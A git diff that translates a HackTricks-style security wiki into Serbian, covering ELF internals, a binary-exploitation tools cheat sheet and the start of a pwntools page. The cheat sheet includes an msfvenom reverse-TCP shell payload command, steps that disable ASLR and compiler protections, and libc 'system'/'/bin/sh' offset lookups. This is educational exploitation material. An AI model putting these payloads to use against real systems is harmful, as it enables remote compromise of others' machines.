2**3 +CONTENTS, ALLOC, LOAD, DATA +21 .got 000001a8 000000000001fe58 000000000001fe58 0000fe58 2**3 +CONTENTS, ALLOC, LOAD, DATA +22 .data 00000170 0000000000020000 0000000000020000 00010000 2**3 +CONTENTS, ALLOC, LOAD, DATA +23 .bss 00000c68 0000000000020170 0000000000020170 00010170 2**3 +ALLOC +24 .gnu_debugaltlink 00000049 0000000000000000 0000000000000000 00010170 2**0 +CONTENTS, READONLY +25 .gnu_debuglink 00000034 0000000000000000 0000000000000000 000101bc 2**2 +CONTENTS, READONLY ``` +To takođe ukazuje na lokaciju, ofset, dozvole, ali i na **tip podataka** koji sekcija ima. -It also indicates the location, offset, permissions but also the **type of data** it section has. +### Meta Sekcije -### Meta Sections +- **String tabela**: Sadrži sve stringove potrebne ELF datoteci (ali ne i one koje program zapravo koristi). Na primer, sadrži imena sekcija kao što su `.text` ili `.data`. I ako je `.text` na ofsetu 45 u string tabeli, koristiće broj **45** u polju **ime**. +- Da bi se pronašlo gde se nalazi string tabela, ELF sadrži pokazivač na string tabelu. +- **Symbol tabela**: Sadrži informacije o simbolima kao što su ime (ofset u string tabeli), adresa, veličina i više metapodataka o simbolu. -- **String table**: It contains all the strings needed by the ELF file (but not the ones actually used by the program). For example it contains sections names like `.text` or `.data`. And if `.text` is at offset 45 in the strings table it will use the number **45** in the **name** field. - - In order to find where the string table is, the ELF contains a pointer to the string table. -- **Symbol table**: It contains info about the symbols like the name (offset in the strings table), address, size and more metadata about the symbol. +### Glavne Sekcije -### Main Sections +- **`.text`**: Instrukcija programa koja se izvršava. +- **`.data`**: Globalne promenljive sa definisanom vrednošću u programu. +- **`.bss`**: Globalne promenljive koje nisu inicijalizovane (ili su inicijalizovane na nulu). Promenljive ovde se automatski inicijalizuju na nulu, čime se sprečava dodavanje bespotrebnih nula u binarni fajl. +- **`.rodata`**: Konstantne globalne promenljive (sekcija samo za čitanje). +- **`.tdata`** i **`.tbss`**: Kao .data i .bss kada se koriste promenljive lokalne za nit (`__thread_local` u C++ ili `__thread` u C). +- **`.dynamic`**: Vidi ispod. -- **`.text`**: The instruction of the program to run. -- **`.data`**: Global variables with a defined value in the program. -- **`.bss`**: Global variables left uninitialized (or init to zero). Variables here are automatically intialized to zero therefore preventing useless zeroes to being added to the binary. -- **`.rodata`**: Constant global variables (read-only section). -- **`.tdata`** and **`.tbss`**: Like the .data and .bss when thread-local variables are used (`__thread_local` in C++ or `__thread` in C). -- **`.dynamic`**: See below. - -## Symbols - -Symbols is a named location in the program which could be a function, a global data object, thread-local variables... +## Simboli +Simboli su imenovane lokacije u programu koje mogu biti funkcija, globalni objekat podataka, promenljive lokalne za nit... ``` readelf -s lnstat Symbol table '.dynsym' contains 49 entries: - Num: Value Size Type Bind Vis Ndx Name - 0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND - 1: 0000000000001088 0 SECTION LOCAL DEFAULT 12 .init - 2: 0000000000020000 0 SECTION LOCAL DEFAULT 23 .data - 3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strtok@GLIBC_2.17 (2) - 4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND s[...]@GLIBC_2.17 (2) - 5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.17 (2) - 6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.17 (2) - 7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.17 (2) - 8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (3) - 9: 0000000000000000 0 FUNC GLOBAL DEFAULT UND perror@GLIBC_2.17 (2) - 10: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...] - 11: 0000000000000000 0 FUNC WEAK DEFAULT UND _[...]@GLIBC_2.17 (2) - 12: 0000000000000000 0 FUNC GLOBAL DEFAULT UND putc@GLIBC_2.17 (2) - [...] +Num: Value Size Type Bind Vis Ndx Name +0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND +1: 0000000000001088 0 SECTION LOCAL DEFAULT 12 .init +2: 0000000000020000 0 SECTION LOCAL DEFAULT 23 .data +3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strtok@GLIBC_2.17 (2) +4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND s[...]@GLIBC_2.17 (2) +5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.17 (2) +6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.17 (2) +7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.17 (2) +8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (3) +9: 0000000000000000 0 FUNC GLOBAL DEFAULT UND perror@GLIBC_2.17 (2) +10: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...] +11: 0000000000000000 0 FUNC WEAK DEFAULT UND _[...]@GLIBC_2.17 (2) +12: 0000000000000000 0 FUNC GLOBAL DEFAULT UND putc@GLIBC_2.17 (2) +[...] ``` +Svaki unos simbola sadrži: -Each symbol entry contains: - -- **Name** -- **Binding attributes** (weak, local or global): A local symbol can only be accessed by the program itself while the global symbol are shared outside the program. A weak object is for example a function that can be overridden by a different one. -- **Type**: NOTYPE (no type specified), OBJECT (global data var), FUNC (function), SECTION (section), FILE (source-code file for debuggers), TLS (thread-local variable), GNU_IFUNC (indirect function for relocation) -- **Section** index where it's located -- **Value** (address sin memory) -- **Size** - -## Dynamic Section +- **Ime** +- **Atributi vezivanja** (slab, lokalni ili globalni): Lokalni simbol može biti pristupljen samo od strane samog programa, dok su globalni simboli deljeni van programa. Slabi objekat je, na primer, funkcija koja može biti zamenjena drugom. +- **Tip**: NOTYPE (tip nije specificiran), OBJECT (globalna podatkovna varijabla), FUNC (funkcija), SECTION (sekcija), FILE (izvorni kod za debagere), TLS (varijabla lokalna za nit), GNU_IFUNC (indirektna funkcija za relokaciju) +- **Sekcija** indeks gde se nalazi +- **Vrednost** (adresa u memoriji) +- **Veličina** +## Dinamička sekcija ``` readelf -d lnstat Dynamic section at offset 0xfc58 contains 28 entries: - Tag Type Name/Value - 0x0000000000000001 (NEEDED) Shared library: [libc.so.6] - 0x0000000000000001 (NEEDED) Shared library: [ld-linux-aarch64.so.1] - 0x000000000000000c (INIT) 0x1088 - 0x000000000000000d (FINI) 0x2f74 - 0x0000000000000019 (INIT_ARRAY) 0x1fc48 - 0x000000000000001b (INIT_ARRAYSZ) 8 (bytes) - 0x000000000000001a (FINI_ARRAY) 0x1fc50 - 0x000000000000001c (FINI_ARRAYSZ) 8 (bytes) - 0x000000006ffffef5 (GNU_HASH) 0x338 - 0x0000000000000005 (STRTAB) 0x7f0 - 0x0000000000000006 (SYMTAB) 0x358 - 0x000000000000000a (STRSZ) 510 (bytes) - 0x000000000000000b (SYMENT) 24 (bytes) - 0x0000000000000015 (DEBUG) 0x0 - 0x0000000000000003 (PLTGOT) 0x1fe58 - 0x0000000000000002 (PLTRELSZ) 960 (bytes) - 0x0000000000000014 (PLTREL) RELA - 0x0000000000000017 (JMPREL) 0xcc8 - 0x0000000000000007 (RELA) 0xaa0 - 0x0000000000000008 (RELASZ) 552 (bytes) - 0x0000000000000009 (RELAENT) 24 (bytes) - 0x000000000000001e (FLAGS) BIND_NOW - 0x000000006ffffffb (FLAGS_1) Flags: NOW PIE - 0x000000006ffffffe (VERNEED) 0xa50 - 0x000000006fffffff (VERNEEDNUM) 2 - 0x000000006ffffff0 (VERSYM) 0x9ee - 0x000000006ffffff9 (RELACOUNT) 15 - 0x0000000000000000 (NULL) 0x0 +Tag Type Name/Value +0x0000000000000001 (NEEDED) Shared library: [libc.so.6] +0x0000000000000001 (NEEDED) Shared library: [ld-linux-aarch64.so.1] +0x000000000000000c (INIT) 0x1088 +0x000000000000000d (FINI) 0x2f74 +0x0000000000000019 (INIT_ARRAY) 0x1fc48 +0x000000000000001b (INIT_ARRAYSZ) 8 (bytes) +0x000000000000001a (FINI_ARRAY) 0x1fc50 +0x000000000000001c (FINI_ARRAYSZ) 8 (bytes) +0x000000006ffffef5 (GNU_HASH) 0x338 +0x0000000000000005 (STRTAB) 0x7f0 +0x0000000000000006 (SYMTAB) 0x358 +0x000000000000000a (STRSZ) 510 (bytes) +0x000000000000000b (SYMENT) 24 (bytes) +0x0000000000000015 (DEBUG) 0x0 +0x0000000000000003 (PLTGOT) 0x1fe58 +0x0000000000000002 (PLTRELSZ) 960 (bytes) +0x0000000000000014 (PLTREL) RELA +0x0000000000000017 (JMPREL) 0xcc8 +0x0000000000000007 (RELA) 0xaa0 +0x0000000000000008 (RELASZ) 552 (bytes) +0x0000000000000009 (RELAENT) 24 (bytes) +0x000000000000001e (FLAGS) BIND_NOW +0x000000006ffffffb (FLAGS_1) Flags: NOW PIE +0x000000006ffffffe (VERNEED) 0xa50 +0x000000006fffffff (VERNEEDNUM) 2 +0x000000006ffffff0 (VERSYM) 0x9ee +0x000000006ffffff9 (RELACOUNT) 15 +0x0000000000000000 (NULL) 0x0 ``` +Direktorijum NEEDED ukazuje da program **treba da učita pomenutu biblioteku** kako bi nastavio. Direktorijum NEEDED se završava kada je deljena **biblioteka potpuno operativna i spremna** za korišćenje. -The NEEDED directory indicates that the program **needs to load the mentioned library** in order to continue. The NEEDED directory completes once the shared **library is fully operational and ready** for use. - -## Relocations - -The loader also must relocate dependencies after having loaded them. These relocations are indicated in the relocation table in formats REL or RELA and the number of relocations is given in the dynamic sections RELSZ or RELASZ. +## Relokacije +Loader takođe mora da relokira zavisnosti nakon što ih učita. Ove relokacije su označene u tabeli relokacija u formatima REL ili RELA, a broj relokacija je dat u dinamičkim sekcijama RELSZ ili RELASZ. ``` readelf -r lnstat Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries: - Offset Info Type Sym. Value Sym. Name + Addend +Offset Info Type Sym. Value Sym. Name + Addend 00000001fc48 000000000403 R_AARCH64_RELATIV 1d10 00000001fc50 000000000403 R_AARCH64_RELATIV 1cc0 00000001fff0 000000000403 R_AARCH64_RELATIV 1340 @@ -273,7 +264,7 @@ Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries: 00000001fff8 002e00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_registerTMCl[...] + 0 Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries: - Offset Info Type Sym. Value Sym. Name + Addend +Offset Info Type Sym. Value Sym. Name + Addend 00000001fe70 000300000402 R_AARCH64_JUMP_SL 0000000000000000 strtok@GLIBC_2.17 + 0 00000001fe78 000400000402 R_AARCH64_JUMP_SL 0000000000000000 strtoul@GLIBC_2.17 + 0 00000001fe80 000500000402 R_AARCH64_JUMP_SL 0000000000000000 strlen@GLIBC_2.17 + 0 @@ -315,82 +306,77 @@ Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries: 00000001ffa0 002f00000402 R_AARCH64_JUMP_SL 0000000000000000 __assert_fail@GLIBC_2.17 + 0 00000001ffa8 003000000402 R_AARCH64_JUMP_SL 0000000000000000 fgets@GLIBC_2.17 + 0 ``` +### Staticke Relokacije -### Static Relocations +Ako je **program učitan na mestu koje se razlikuje** od preferirane adrese (obično 0x400000) zato što je adresa već zauzeta ili zbog **ASLR** ili bilo kog drugog razloga, statička relokacija **ispravlja pokazivače** koji su imali vrednosti očekujući da će binarni fajl biti učitan na preferiranoj adresi. -If the **program is loaded in a place different** from the preferred address (usually 0x400000) because the address is already used or because of **ASLR** or any other reason, a static relocation **corrects pointers** that had values expecting the binary to be loaded in the preferred address. +Na primer, svaka sekcija tipa `R_AARCH64_RELATIV` treba da ima modifikovanu adresu na relokacionom pristrasnosti plus vrednost adenda. -For example any section of type `R_AARCH64_RELATIV` should have modified the address at the relocation bias plus the addend value. +### Dinamičke Relokacije i GOT -### Dynamic Relocations and GOT +Relokacija može takođe referencirati spoljašnji simbol (kao što je funkcija iz zavisnosti). Kao što je funkcija malloc iz libC. Tada, učitavač prilikom učitavanja libC na adresu proverava gde je učitana funkcija malloc, i upisuje ovu adresu u GOT (Global Offset Table) tabelu (naznačenu u relokacionoj tabeli) gde bi adresa malloc trebala biti specificirana. -The relocation could also reference an external symbol (like a function from a dependency). Like the function malloc from libC. Then, the loader when loading libC in an address checking where the malloc function is loaded, it will write this address in the GOT (Global Offset Table) table (indicated in the relocation table) where the address of malloc should be specified. +### Tabela Povezivanja Procedura -### Procedure Linkage Table +PLT sekcija omogućava obavljanje lenjog povezivanja, što znači da će se rešavanje lokacije funkcije obaviti prvi put kada se pristupi. -The PLT section allows to perform lazy binding, which means that the resolution of the location of a function will be performed the first time it's accessed. +Dakle, kada program poziva malloc, zapravo poziva odgovarajuću lokaciju `malloc` u PLT (`malloc@plt`). Prvi put kada se pozove, rešava adresu `malloc` i čuva je tako da se sledeći put kada se pozove `malloc`, ta adresa koristi umesto PLT koda. -So when a program calls to malloc, it actually calls the corresponding location of `malloc` in the PLT (`malloc@plt`). The first time it's called it resolves the address of `malloc` and stores it so next time `malloc` is called, that address is used instead of the PLT code. - -## Program Initialization - -After the program has been loaded it's time for it to run. However, the first code that is run i**sn't always the `main`** function. This is because for example in C++ if a **global variable is an object of a class**, this object must be **initialized** **before** main runs, like in: +## Inicijalizacija Programa +Nakon što je program učitan, vreme je da se pokrene. Međutim, prvi kod koji se izvršava **nije uvek `main`** funkcija. To je zato što, na primer, u C++ ako je **globalna promenljiva objekat klase**, ovaj objekat mora biti **inicijalizovan** **pre** nego što main bude pokrenut, kao u: ```cpp #include // g++ autoinit.cpp -o autoinit class AutoInit { - public: - AutoInit() { - printf("Hello AutoInit!\n"); - } - ~AutoInit() { - printf("Goodbye AutoInit!\n"); - } +public: +AutoInit() { +printf("Hello AutoInit!\n"); +} +~AutoInit() { +printf("Goodbye AutoInit!\n"); +} }; AutoInit autoInit; int main() { - printf("Main\n"); - return 0; +printf("Main\n"); +return 0; } ``` +Napomena da su ove globalne promenljive smeštene u `.data` ili `.bss`, ali u listama `__CTOR_LIST__` i `__DTOR_LIST__` objekti za inicijalizaciju i destrukciju su smešteni kako bi se pratili. -Note that these global variables are located in `.data` or `.bss` but in the lists `__CTOR_LIST__` and `__DTOR_LIST__` the objects to initialize and destruct are stored in order to keep track of them. - -From C code it's possible to obtain the same result using the GNU extensions : - +Iz C koda je moguće dobiti isti rezultat koristeći GNU ekstenzije: ```c __attributte__((constructor)) //Add a constructor to execute before __attributte__((destructor)) //Add to the destructor list ``` +Sa perspektive kompajlera, da bi se izvršile ove radnje pre i posle izvršavanja `main` funkcije, moguće je kreirati `init` funkciju i `fini` funkciju koje bi bile referencirane u dinamičkom odeljku kao **`INIT`** i **`FIN`**. i smeštene su u `init` i `fini` odeljke ELF-a. -From a compiler perspective, to execute these actions before and after the `main` function is executed, it's possible to create a `init` function and a `fini` function which would be referenced in the dynamic section as **`INIT`** and **`FIN`**. and are placed in the `init` and `fini` sections of the ELF. +Druga opcija, kao što je pomenuto, je da se referenciraju liste **`__CTOR_LIST__`** i **`__DTOR_LIST__`** u **`INIT_ARRAY`** i **`FINI_ARRAY`** stavkama u dinamičkom odeljku, a dužina ovih stavki je označena sa **`INIT_ARRAYSZ`** i **`FINI_ARRAYSZ`**. Svaka stavka je pokazivač na funkciju koja će biti pozvana bez argumenata. -The other option, as mentioned, is to reference the lists **`__CTOR_LIST__`** and **`__DTOR_LIST__`** in the **`INIT_ARRAY`** and **`FINI_ARRAY`** entries in the dynamic section and the length of these are indicated by **`INIT_ARRAYSZ`** and **`FINI_ARRAYSZ`**. Each entry is a function pointer that will be called without arguments. +Štaviše, moguće je imati i **`PREINIT_ARRAY`** sa **pokazivačima** koji će biti izvršeni **pre** **`INIT_ARRAY`** pokazivača. -Moreover, it's also possible to have a **`PREINIT_ARRAY`** with **pointers** that will be executed **before** the **`INIT_ARRAY`** pointers. +### Redosled inicijalizacije -### Initialization Order - -1. The program is loaded into memory, static global variables are initialized in **`.data`** and unitialized ones zeroed in **`.bss`**. -2. All **dependencies** for the program or libraries are **initialized** and the the **dynamic linking** is executed. -3. **`PREINIT_ARRAY`** functions are executed. -4. **`INIT_ARRAY`** functions are executed. -5. If there is a **`INIT`** entry it's called. -6. If a library, dlopen ends here, if a program, it's time to call the **real entry point** (`main` function). +1. Program se učitava u memoriju, statičke globalne promenljive se inicijalizuju u **`.data`** i neinicijalizovane se postavljaju na nulu u **`.bss`**. +2. Sve **zavisnosti** za program ili biblioteke se **inicijalizuju** i izvršava se **dinamičko povezivanje**. +3. **`PREINIT_ARRAY`** funkcije se izvršavaju. +4. **`INIT_ARRAY`** funkcije se izvršavaju. +5. Ako postoji **`INIT`** stavka, ona se poziva. +6. Ako je u pitanju biblioteka, dlopen ovde završava, ako je program, vreme je da se pozove **pravi ulazni tačka** (`main` funkcija). ## Thread-Local Storage (TLS) -They are defined using the keyword **`__thread_local`** in C++ or the GNU extension **`__thread`**. +Definišu se korišćenjem ključne reči **`__thread_local`** u C++ ili GNU ekstenzije **`__thread`**. -Each thread will maintain a unique location for this variable so only the thread can access its variable. +Svaki nit će održavati jedinstvenu lokaciju za ovu promenljivu tako da samo nit može pristupiti svojoj promenljivoj. -When this is used the sections **`.tdata`** and **`.tbss`** are used in the ELF. Which are like `.data` (initialized) and `.bss` (not initialized) but for TLS. +Kada se ovo koristi, odeljci **`.tdata`** i **`.tbss`** se koriste u ELF-u. Koji su slični `.data` (inicijalizovano) i `.bss` (neinicijalizovano) ali za TLS. -Each variable will hace an entry in the TLS header specifying the size and the TLS offset, which is the offset it will use in the thread's local data area. +Svaka promenljiva će imati stavku u TLS headeru koja specificira veličinu i TLS offset, što je offset koji će koristiti u lokalnom području podataka niti. -The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thread local storage and points to the area in memory that contains all the thread-local data of a module. +`__TLS_MODULE_BASE` je simbol koji se koristi za referenciranje osnovne adrese skladišta lokalnih niti i ukazuje na područje u memoriji koje sadrži sve podatke lokalne za niti modula. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md index 70aa57cc5..5bad25144 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md @@ -1,9 +1,8 @@ -# Exploiting Tools +# Alati za iskorišćavanje {{#include ../../../banners/hacktricks-training.md}} ## Metasploit - ```bash pattern_create.rb -l 3000 #Length pattern_offset.rb -l 3000 -q 5f97d534 #Search offset @@ -11,31 +10,23 @@ nasm_shell.rb nasm> jmp esp #Get opcodes msfelfscan -j esi /opt/fusion/bin/level01 ``` - ### Shellcodes - ```bash msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c ``` - ## GDB -### Install - +### Instaliraj ```bash apt-get install gdb ``` - -### Parameters - +### Parametri ```bash -q # No show banner -x # Auto-execute GDB instructions from here -p # Attach to process ``` - -### Instructions - +### Uputstva ```bash run # Execute start # Start and break in main @@ -81,11 +72,9 @@ x/s pointer # String pointed by the pointer x/xw &pointer # Address where the pointer is located x/i $eip # Instructions of the EIP ``` - ### [GEF](https://github.com/hugsy/gef) -You could optionally use [**this fork of GE**](https://github.com/bata24/gef)[**F**](https://github.com/bata24/gef) which contains more interesting instructions. - +Možete opcionalno koristiti [**ovu fork verziju GE**](https://github.com/bata24/gef)[**F**](https://github.com/bata24/gef) koja sadrži zanimljivije upute. ```bash help memory # Get help on memory command canary # Search for canary value in memory @@ -118,34 +107,32 @@ dump binary memory /tmp/dump.bin 0x200000000 0x20000c350 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it 2- ef➤ i f Stack level 0, frame at 0x7fffffffddd0: - rip = 0x400cd3; saved rip = 0x6261617762616176 - called by frame at 0x7fffffffddd8 - Arglist at 0x7fffffffdcf8, args: - Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 - Saved registers: - rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 +rip = 0x400cd3; saved rip = 0x6261617762616176 +called by frame at 0x7fffffffddd8 +Arglist at 0x7fffffffdcf8, args: +Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 +Saved registers: +rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 gef➤ pattern search 0x6261617762616176 [+] Searching for '0x6261617762616176' [+] Found at offset 184 (little-endian search) likely ``` +### Trikovi -### Tricks +#### GDB iste adrese -#### GDB same addresses - -While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing: +Dok debagujete, GDB će imati **malo drugačije adrese od onih koje koristi binarni fajl kada se izvršava.** Možete učiniti da GDB ima iste adrese tako što ćete: - `unset env LINES` - `unset env COLUMNS` -- `set env _=` _Put the absolute path to the binary_ -- Exploit the binary using the same absolute route -- `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary +- `set env _=` _Unesite apsolutnu putanju do binarnog fajla_ +- Iskoristite binarni fajl koristeći istu apsolutnu putanju +- `PWD` i `OLDPWD` moraju biti isti kada koristite GDB i kada eksploatišete binarni fajl -#### Backtrace to find functions called - -When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\ -You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called: +#### Backtrace za pronalaženje pozvanih funkcija +Kada imate **staticki povezani binarni fajl**, sve funkcije će pripadati binarnom fajlu (a ne spoljnim bibliotekama). U ovom slučaju će biti teško **identifikovati tok koji binarni fajl prati da bi, na primer, zatražio unos od korisnika.**\ +Možete lako identifikovati ovaj tok tako što ćete **pokrenuti** binarni fajl sa **gdb** dok ne budete zatraženi za unos. Zatim, zaustavite ga sa **CTRL+C** i koristite **`bt`** (**backtrace**) komandu da vidite pozvane funkcije: ``` gef➤ bt #0 0x00000000004498ae in ?? () @@ -154,87 +141,80 @@ gef➤ bt #3 0x00000000004011a9 in ?? () #4 0x0000000000400a5a in ?? () ``` - ### GDB server -`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine) +`gdbserver --multi 0.0.0.0:23947` (u IDA morate uneti apsolutnu putanju izvršne datoteke na Linux mašini i na Windows mašini) ## Ghidra ### Find stack offset -**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\ -For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ -&#xNAN;_Remember that the first 0x08 from where the RIP is saved belongs to the RBP._ +**Ghidra** je veoma korisna za pronalaženje **offset-a** za **buffer overflow zahvaljujući informacijama o poziciji lokalnih promenljivih.**\ +Na primer, u primeru ispod, buffer flow u `local_bc` ukazuje da vam je potreban offset od `0xbc`. Pored toga, ako je `local_10` kanarska kolačić, to ukazuje da da biste ga prepisali iz `local_bc` postoji offset od `0xac`.\ +&#xNAN;_Remember da prvih 0x08 odakle se čuva RIP pripada RBP._ ![](<../../../images/image (1061).png>) ## qtool - ```bash qltool run -v disasm --no-console --log-file disasm.txt --rootfs ./ ./prog ``` - -Get every opcode executed in the program. +Dobijte svaki opcode izvršen u programu. ## GCC -**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\ -&#xNAN;**-o** --> Output\ -&#xNAN;**-g** --> Save code (GDB will be able to see it)\ -**echo 0 > /proc/sys/kernel/randomize_va_space** --> To deactivate the ASLR in linux +**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Kompajlirajte bez zaštita\ +&#xNAN;**-o** --> Izlaz\ +&#xNAN;**-g** --> Sačuvajte kod (GDB će moći da ga vidi)\ +**echo 0 > /proc/sys/kernel/randomize_va_space** --> Da deaktivirate ASLR u linuxu -**To compile a shellcode:**\ -**nasm -f elf assembly.asm** --> return a ".o"\ -**ld assembly.o -o shellcodeout** --> Executable +**Da kompajlirate shellcode:**\ +**nasm -f elf assembly.asm** --> vraća ".o"\ +**ld assembly.o -o shellcodeout** --> Izvršni ## Objdump -**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\ -&#xNAN;**-Mintel** --> **Intel** syntax\ -&#xNAN;**-t** --> **Symbols** table\ -&#xNAN;**-D** --> **Disassemble all** (address of static variable)\ -&#xNAN;**-s -j .dtors** --> dtors section\ -&#xNAN;**-s -j .got** --> got section\ --D -s -j .plt --> **plt** section **decompiled**\ -&#xNAN;**-TR** --> **Relocations**\ -**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\ -**objdump -D ./exec | grep "VAR_NAME"** --> Address or a static variable (those are stored in DATA section). +**-d** --> **Disasemblirajte izvršne** sekcije (vidite opkode kompajliranog shellcode-a, pronađite ROP Gadgets, pronađite adresu funkcije...)\ +&#xNAN;**-Mintel** --> **Intel** sintaksa\ +&#xNAN;**-t** --> **Tabela** simbola\ +&#xNAN;**-D** --> **Disasemblirajte sve** (adresa statične promenljive)\ +&#xNAN;**-s -j .dtors** --> dtors sekcija\ +&#xNAN;**-s -j .got** --> got sekcija\ +-D -s -j .plt --> **plt** sekcija **dekompilirana**\ +&#xNAN;**-TR** --> **Relokacije**\ +**ojdump -t --dynamic-relo ./exec | grep puts** --> Adresa "puts" za modifikaciju u GOT\ +**objdump -D ./exec | grep "VAR_NAME"** --> Adresa ili statična promenljiva (one su smeštene u DATA sekciji). ## Core dumps -1. Run `ulimit -c unlimited` before starting my program -2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` +1. Pokrenite `ulimit -c unlimited` pre nego što pokrenete moj program +2. Pokrenite `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` 3. sudo gdb --core=\ --quiet -## More +## Više -**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\ -**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Loop to see if the address changes a lot\ -**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset of "system"\ -**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset of "/bin/sh" +**ldd izvršni | grep libc.so.6** --> Adresa (ako je ASLR, onda se ovo menja svaki put)\ +**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Petlja da vidite da li se adresa mnogo menja\ +**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset "system"\ +**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset "/bin/sh" -**strace executable** --> Functions called by the executable\ -**rabin2 -i ejecutable -->** Address of all the functions +**strace izvršni** --> Funkcije koje poziva izvršni\ +**rabin2 -i ejecutable -->** Adresa svih funkcija ## **Inmunity debugger** - ```bash !mona modules #Get protections, look for all false except last one (Dll of SO) !mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) ``` - ## IDA -### Debugging in remote linux - -Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary `linux_server` or `linux_server64` inside the linux server and run it nside the folder that contains the binary: +### Debugging u udaljenom linuxu +Unutar IDA fascikle možete pronaći binarne datoteke koje se mogu koristiti za debagovanje binarne datoteke unutar linuxa. Da biste to uradili, premestite binarnu datoteku `linux_server` ili `linux_server64` unutar linux servera i pokrenite je unutar fascikle koja sadrži binarnu datoteku: ``` ./linux_server64 -Ppass ``` - -Then, configure the debugger: Debugger (linux remote) --> Proccess options...: +Zatim, konfigurišite debager: Debugger (linux remote) --> Opcije procesa...: ![](<../../../images/image (858).png>) diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md index 6175aeaa2..e6dc428bd 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md @@ -1,120 +1,100 @@ # PwnTools {{#include ../../../banners/hacktricks-training.md}} - ``` pip3 install pwntools ``` - ## Pwn asm -Get **opcodes** from line or file. - +Dobijte **opkode** iz linije ili fajla. ``` pwn asm "jmp esp" pwn asm -i ``` +**Može se odabrati:** -**Can select:** - -- output type (raw,hex,string,elf) -- output file context (16,32,64,linux,windows...) -- avoid bytes (new lines, null, a list) -- select encoder debug shellcode using gdb run the output +- tip izlaza (raw, hex, string, elf) +- kontekst izlaza (16, 32, 64, linux, windows...) +- izbegavanje bajtova (nove linije, null, lista) +- odabrati enkoder za debagovanje shellcode-a koristeći gdb za pokretanje izlaza ## **Pwn checksec** -Checksec script - +Checksec skripta ``` pwn checksec ``` - ## Pwn constgrep ## Pwn cyclic -Get a pattern - +Dobijte obrazac ``` pwn cyclic 3000 pwn cyclic -l faad ``` +**Može se odabrati:** -**Can select:** - -- The used alphabet (lowercase chars by default) -- Length of uniq pattern (default 4) -- context (16,32,64,linux,windows...) -- Take the offset (-l) +- Korišćeni alfabet (mala slova po defaultu) +- Dužina jedinstvenog obrasca (podrazumevano 4) +- kontekst (16,32,64,linux,windows...) +- Uzmite ofset (-l) ## Pwn debug -Attach GDB to a process - +Priključite GDB na proces ``` pwn debug --exec /bin/bash pwn debug --pid 1234 pwn debug 